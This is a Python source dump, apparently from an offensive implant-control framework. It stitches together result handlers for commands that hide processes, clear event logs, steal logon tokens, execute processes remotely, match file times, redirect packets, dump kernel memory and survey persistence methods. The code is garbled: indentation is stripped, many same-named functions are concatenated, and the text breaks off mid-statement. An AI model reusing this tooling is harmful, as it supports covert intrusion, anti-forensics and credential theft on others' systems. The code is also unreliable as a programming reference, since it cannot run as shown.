def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.data.env
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.put',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Put', 'put', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
if msg.GetCount() == 0:
mcl.data.env.SetValue(LP_ENV_PUT_COMPLETE, 'true')
return True
results = Result()
try:
results.Demarshal(msg)
except:
output.RecordError('Failed to get callback parameters')
mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true')
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
if len(results.filePath) > 0:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddSubElementWithText('File', results.filePath)
output.RecordXml(xml)
mcl.data.env.SetValue(LP_ENV_FILE_OPENED, 'true')
bytesLeft = int(mcl.data.env.GetValue(LP_ENV_BYTES_LEFT))
totalBytes = int(mcl.data.env.GetValue(LP_ENV_FILE_SIZE))
if results.bytesWritten > bytesLeft:
output.RecordError('Target reported more data written than is left?!')
mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true')
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
if results.bytesWritten > 0:
bytesLeft -= results.bytesWritten
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddAttribute('bytesWritten', '%u' % results.bytesWritten)
xml.AddAttribute('bytesLeft', '%u' % bytesLeft)
xml.AddAttribute('totalBytes', '%u' % totalBytes)
output.RecordXml(xml)
mcl.data.env.SetValue(LP_ENV_BYTES_LEFT, '%u' % bytesLeft)
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.network.cmd.banner',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Banner', 'banner', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
if moduleError == ERR_RECV_TIMEOUT:
output.SetTaskStatus(mcl.target.CALL_SUCCEEDED)
else:
output.SetTaskStatus(input.GetStatus())
output.End()
return True
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
result = Result()
result.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
if result.socketType == SOCKET_TYPE_TCP:
xml.Start('Connected')
output.RecordXml(xml)
xml.Start('Transfer')
xml.AddAttribute('address', '%s' % result.rspAddr)
xml.AddAttribute('port', '%u' % result.port)
sub = xml.AddSubElement('Data')
sub.AddAttribute('size', '%u' % len(result.response))
if len(result.response) > 0:
sub.SetTextAsData(result.response)
textStr = ''
for char in result.response:
if char == ord('\r') or char == ord('\n') or char == ord(
'\t') or char >= ord(' ') and char <= ord('~'):
textStr = textStr + chr(char)
else:
textStr = textStr + '?'
sub = xml.AddSubElementWithText('Text', textStr)
output.RecordXml(xml)
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.hide',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Hide', 'hide', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
if moduleError == ERR_LIBRARY_CALL_FAILED:
import mcl.hiding.errors.process_hide
output.RecordModuleError(moduleError, 0, errorStrings)
output.RecordModuleError(
osError, 0, mcl.hiding.errors.process_hide.errorStrings)
elif moduleError == ERR_JUMPUP_FAILED:
output.RecordModuleError(moduleError, 0, errorStrings)
import mcl.privilege.errors
output.RecordModuleError(osError, 0,
mcl.privilege.errors.errorStrings)
else:
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
if results.type == RESULT_TYPE_PROCESS_HIDE:
xml.Start('Hidden')
xml.AddAttribute('type', 'Process')
xml.AddAttribute('value', results.item)
elif results.type == RESULT_TYPE_PROCESS_UNHIDE:
xml.Start('Unhidden')
xml.AddAttribute('type', 'Process')
xml.AddAttribute('value', results.item)
else:
output.RecordError('Unhandled result type (%u)' % results.type)
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
if len(results.metaData) > 0:
xml.AddSubElementWithText('MetaData', results.metaData)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handlePacket(mca, sock, pktSize, tgtParams):
import mcl
import mcl.tasking
import array
import socket
recvBuffer = array.array('B')
i = 0
while i < pktSize:
recvBuffer.append(0)
i = i + 1
packetToSend = array.array('B')
total = 0
while total < pktSize:
if mcl.CheckForStop():
mcl.tasking.TaskSetStatus(mcl.target.CALL_FAILED)
raise RuntimeError('Context is no longer valid')
numRcvd = sock.recv_into(recvBuffer, pktSize - total)
if numRcvd == 0:
raise socket.error('Connection closed by remote host')
i = 0
while i < numRcvd:
packetToSend.append(recvBuffer[i])
i = i + 1
total = total + numRcvd
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PacketData')
xml.AddAttribute('size', '%u' % pktSize)
xml.SetTextAsData(packetToSend)
mcl.tasking.OutputXml(xml)
_sendPacket(mca, tgtParams, packetToSend)
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.file.cmd.matchfiletimes',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('MatchFileTimes', 'matchfiletimes', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddSubElementWithText('Src', results.src)
xml.AddSubElementWithText('Dst', results.dst)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handlePersistence(namespace, output, msg):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('KiSuSurveyPersistence')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
result = ResultPersistence()
result.Demarshal(msg)
sub = xml.AddSubElement('Method')
if result.type == RESULT_PERSISTENCE_TYPE_LAUNCHER:
sub.AddSubElementWithText('Type', 'DRIVER')
elif result.type == RESULT_PERSISTENCE_TYPE_SOTI:
sub.AddSubElementWithText('Type', 'SOTI')
elif result.type == RESULT_PERSISTENCE_TYPE_JUVI:
sub.AddSubElementWithText('Type', 'JUVI')
else:
sub.AddSubElementWithText('Type', 'UNKNOWN')
if result.compatible:
sub.AddSubElementWithText('Compatible', 'true')
else:
sub.AddSubElementWithText('Compatible', 'false')
if result.reason != 0:
mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.diba_errors',
globals())
if mcf.kisu.diba_errors.errorStrings.has_key(result.reason):
reasonStr = mcf.kisu.diba_errors.errorStrings[result.reason]
else:
reasonStr = 'Unknown (0x%08x)' % result.reason
sub.AddSubElementWithText('Reason', reasonStr)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleSchedulerDelete(output, msg):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Deleted')
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleConnect(namespace, output, msg):
import mcl.imports
result = ResultConnect()
result.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('KiSuCommsInitialized')
xml.AddAttribute('id', '0x%08x' % result.instance.id)
xml.AddAttribute('versionMajor', '%u' % result.instance.versionMajor)
xml.AddAttribute('versionMinor', '%u' % result.instance.versionMinor)
xml.AddAttribute('versionFix', '%u' % result.instance.versionFix)
xml.AddAttribute('versionBuild', '%u' % result.instance.versionBuild)
mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids', globals())
for name in mcf.kisu.ids.nameTable:
if mcf.kisu.ids.nameTable[name] == result.instance.id:
xml.AddAttribute('name', name)
break
output.RecordXml(xml)
import mcl.data.env
mcl.data.env.SetValue(mcf.cmd.kisucomms.COMMS_ESTABLISHED_ENV,
'0x%08x' % result.instance.id,
globalValue=True)
import mcl.tools
verInfo = mcl.tools.GetVersion('DeMi')
if verInfo != None:
mcl.tools.RecordUsage('DeMi',
verInfo['full'],
mcl.tools.USAGE_FLAG_CHECKED,
mcl.tools.USAGE_STATUS_SUCCESSFUL,
comments='Connected to 0x%08x' %
result.instance.id)
return mcl.target.CALL_SUCCEEDED
def _handleGetStatus(output, msg):
results = ResultGetStatus()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Status')
if results.filterActive:
xml.AddAttribute('filterActive', 'true')
else:
xml.AddAttribute('filterActive', 'false')
if results.packetThreadRunning:
xml.AddAttribute('threadRunning', 'true')
else:
xml.AddAttribute('threadRunning', 'false')
xml.AddAttribute('maxCaptureSize', '%u' % results.maxCaptureFileSize)
xml.AddAttribute('captureFile', results.captureFile)
xml.AddAttribute('captureFileSize', '%u' % results.captureFileSize)
xml.AddAttribute('maxPacketSize', '%u' % results.maxPacketSize)
if len(results.key) > 0:
sub = xml.AddSubElement('EncryptionKey')
sub.SetTextAsData(results.key)
sub = xml.AddSubElement('Version')
sub.AddAttribute('major', '%u' % results.majorVersion)
sub.AddAttribute('minor', '%u' % results.minorVersion)
sub.AddAttribute('revision', '%u' % results.revision)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleList(namespace, output, msg):
import mcl.imports
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('KiSuEnumeration')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
result = ResultInstance()
result.Demarshal(msg)
if result.id != 0:
sub = xml.AddSubElement('KiSu')
sub.AddAttribute('id', '0x%08x' % result.id)
sub.AddAttribute('versionMajor', '%u' % result.versionMajor)
sub.AddAttribute('versionMinor', '%u' % result.versionMinor)
sub.AddAttribute('versionFix', '%u' % result.versionFix)
sub.AddAttribute('versionBuild', '%u' % result.versionBuild)
mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids',
globals())
for name in mcf.kisu.ids.nameTable:
if mcf.kisu.ids.nameTable[name] == result.id:
sub.AddAttribute('name', name)
break
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.move',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Move', 'move', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
if results.afterReboot:
xml.AddAttribute('delay', 'true')
else:
xml.AddAttribute('delay', 'false')
xml.AddSubElementWithText('Source', results.fullSrcPath)
xml.AddSubElementWithText('Destination', results.fullDstPath)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.gezu.cmd.GeZu_KernelMemory',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('GeZu_KernelMemory', 'GeZu_KernelMemory', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('GeZu_KernelMemoryResponse')
results = Result()
results.Demarshal(msg)
sub = xml.AddSubElement('MemDump')
sub.SetTextAsData(results.memDump)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleQueryData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('QueryResponse')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
data = ResultQuery()
data.Demarshal(msg)
sub = xml.AddSubElement('Resource')
sub.AddSubElementWithText('Name', data.name)
if data.hasPath:
sub.AddSubElementWithText('Path', data.path)
type = sub.AddSubElement('Type')
if data.admin:
type.AddAttribute('admin', 'true')
else:
type.AddAttribute('admin', 'false')
if data.type == RESULT_QUERY_TYPE_DISK:
type.SetText('Disk')
elif data.type == RESULT_QUERY_TYPE_DEVICE:
type.SetText('Device')
elif data.type == RESULT_QUERY_TYPE_PRINT:
type.SetText('Print')
elif data.type == RESULT_QUERY_TYPE_IPC:
type.SetText('IPC')
else:
type.SetText('Unknown')
sub.AddSubElementWithText('Caption', data.caption)
sub.AddSubElementWithText('Description', data.description)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.eventlogclear', globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('EventLogClear', 'eventlogclear', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Cleared')
if len(results.target) > 0:
xml.AddAttribute('target', results.target)
xml.SetText(results.logName)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.rmdir',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Rmdir', 'rmdir', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
result = Result()
result.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('TargetDir')
xml.SetText('%s' % result.fullPath)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleWindowStationData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('WindowStations')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
submsg = msg.FindMessage(MSG_KEY_RESULT_WINDOW_STATION)
info = ResultWindowStations()
info.Demarshal(submsg)
sub = xml.AddSubElement('WindowStation')
sub.AddAttribute('name', info.name)
if info.openStatus != 0:
error = output.TranslateOsError(info.openStatus)
sub.AddAttribute('status', error)
else:
sub.AddAttribute('flags', '0x%08x' % info.flags)
if info.flags & RESULT_WINSTA_FLAG_VISIBLE:
sub.AddSubElement('WindowStationFlag_Visible')
while submsg.GetNumRetrieved() < submsg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
desktop = submsg.FindString(MSG_KEY_RESULT_WINDOW_STATION_DESKTOP)
sub.AddSubElementWithText('Desktop', desktop)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.uptime',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('UpTime', 'uptime', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
data = Result()
data.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Uptime')
xml.AddTimeElement('Duration', data.upTime)
if data.idleTime.GetTimeType() != data.idleTime.MCL_TIME_TYPE_NOT_A_TIME:
xml.AddTimeElement('IdleTime', data.idleTime)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.network.cmd.packetredirect',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('PacketRedirect', 'packetredirect', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
else:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PacketSent')
output.RecordXml(xml)
output.End()
return True
def _handleStatus(msg, output):
submsg = msg.FindMessage(MSG_KEY_RESULT_STATUS)
status = ResultStatusHeader()
status.Demarshal(submsg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Status')
if status.flags & RESULT_STATUS_FLAG_FIREWALL_ENABLED:
xml.AddAttribute('enabled', 'true')
else:
xml.AddAttribute('enabled', 'false')
if status.flags & RESULT_STATUS_FLAG_VISTA:
if status.flags & RESULT_STATUS_FLAG_NO_MODIFY:
xml.AddAttribute('modify', 'false')
else:
xml.AddAttribute('modify', 'true')
while submsg.GetNumRetrieved() < submsg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
_outputProfile(submsg, output, xml)
output.RecordXml(xml)
output.End()
return True
def _handleWindowsData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Windows')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
info = ResultWindowInfo()
info.Demarshal(msg)
sub = xml.AddSubElement('Window')
sub.AddAttribute('hWnd', '0x%x' % info.hWnd)
sub.AddAttribute('hParent', '0x%x' % info.hParent)
sub.AddAttribute('pid', '%u' % info.owningPid)
sub.AddAttribute('title', info.text)
sub.AddAttribute('x', '%d' % info.x)
sub.AddAttribute('y', '%d' % info.y)
sub.AddAttribute('width', '%u' % info.width)
sub.AddAttribute('height', '%u' % info.height)
if info.flags & RESULT_WININFO_FLAG_IS_VISIBLE:
sub.AddSubElement('WindowIsVisible')
if info.flags & RESULT_WININFO_FLAG_IS_MINIMIZED:
sub.AddSubElement('WindowIsMinimized')
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.process.cmd.remoteexecute',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('RemoteExecute', 'remoteexecute', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('RemoteProcess')
xml.AddSubElementWithText('Id', '%u' % results.processId)
xml.AddSubElementWithText('RetVal', '%d' % results.returnValue)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleAdapters(output, msg):
if msg.GetCount() == 0:
output.RecordError('No status values returned')
return mcl.target.CALL_FAILED
submsg = msg.FindMessage(MSG_KEY_RESULT_ADAPTERS)
results = ResultFilterInfo()
results.Demarshal(submsg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('AdaptersInfo')
if results.threadRunning:
xml.AddAttribute('threadRunning', 'true')
else:
xml.AddAttribute('threadRunning', 'false')
if results.filterActive:
xml.AddAttribute('filterActive', 'true')
else:
xml.AddAttribute('filterActive', 'false')
xml.AddAttribute('numAdapters',
'%u' % submsg.GetCount(MSG_KEY_RESULT_ADAPTER_NAME))
while submsg.GetNumRetrieved() < submsg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
name = submsg.FindString(MSG_KEY_RESULT_ADAPTER_NAME)
xml.AddSubElementWithText('Adapter', name)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleDuplicateTokenSteal(msg, output):
import mcl.data.env
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
info = ResultSteal()
info.Demarshal(msg)
try:
alias = 'proc%u' % info.id
mcl.data.env.SetValue('_USER_%s' % alias,
'0x%08x' % info.hUser,
globalValue=True)
aliasSet = True
except:
output.RecordError('Failed to set alias for user')
aliasSet = False
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Logon')
xml.AddAttribute('handle', '0x%08x' % info.hUser)
if aliasSet:
xml.AddAttribute('alias', alias)
output.RecordXml(xml)
output.GoToBackground()
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.objects', globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Objects', 'objects', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
else:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Objects')
gotValidDir = False
objectList = list()
sub = None
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
result = Result()
try:
result.Demarshal(msg)
except:
output.RecordXml(xml)
raise
if result.flags & RESULT_FLAG_DIR_START:
_dumpObjects(sub, objectList)
_deleteObjects(objectList)
sub = xml.AddSubElement('ObjectDirectory')
sub.AddAttribute('name', result.name)
if result.status != 0:
errorStr = output.TranslateOsError(result.status)
sub.AddSubElementWithText('QueryFailure', errorStr)
else:
gotValidDir = True
elif sub != None:
_addObject(objectList, result)
_dumpObjects(sub, objectList)
_deleteObjects(objectList)
output.RecordXml(xml)
if gotValidDir:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
else:
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
def _handleAuditQueryData(msg, output):
results = ResultAuditStatus()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Status')
if results.auditingEnabled:
xml.AddAttribute('current', 'ON')
else:
xml.AddAttribute('current', 'OFF')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
eventResults = ResultCategory()
eventResults.Demarshal(msg)
sub = xml.AddSubElement('Event')
if eventResults.flags & RESULT_FLAG_AUDIT_ONSUCCESS:
sub.AddSubElement('OnSuccess')
if eventResults.flags & RESULT_FLAG_AUDIT_ONFAILURE:
sub.AddSubElement('OnFailure')
category = _lookupName(eventResults.categoryGuid)
subcategory = _lookupName(eventResults.subcategoryGuid)
sub.AddAttribute(
'categoryGUID',
'%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x%02x%02x'
% (eventResults.categoryGuid[0], eventResults.categoryGuid[1],
eventResults.categoryGuid[2], eventResults.categoryGuid[3],
eventResults.categoryGuid[4], eventResults.categoryGuid[5],
eventResults.categoryGuid[6], eventResults.categoryGuid[7],
eventResults.categoryGuid[8], eventResults.categoryGuid[9],
eventResults.categoryGuid[10], eventResults.categoryGuid[11],
eventResults.categoryGuid[12], eventResults.categoryGuid[13],
eventResults.categoryGuid[14], eventResults.categoryGuid[15]))
sub.AddAttribute(
'subcategoryGUID',
'%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x%02x%02x'
%
(eventResults.subcategoryGuid[0], eventResults.subcategoryGuid[1],
eventResults.subcategoryGuid[2], eventResults.subcategoryGuid[3],
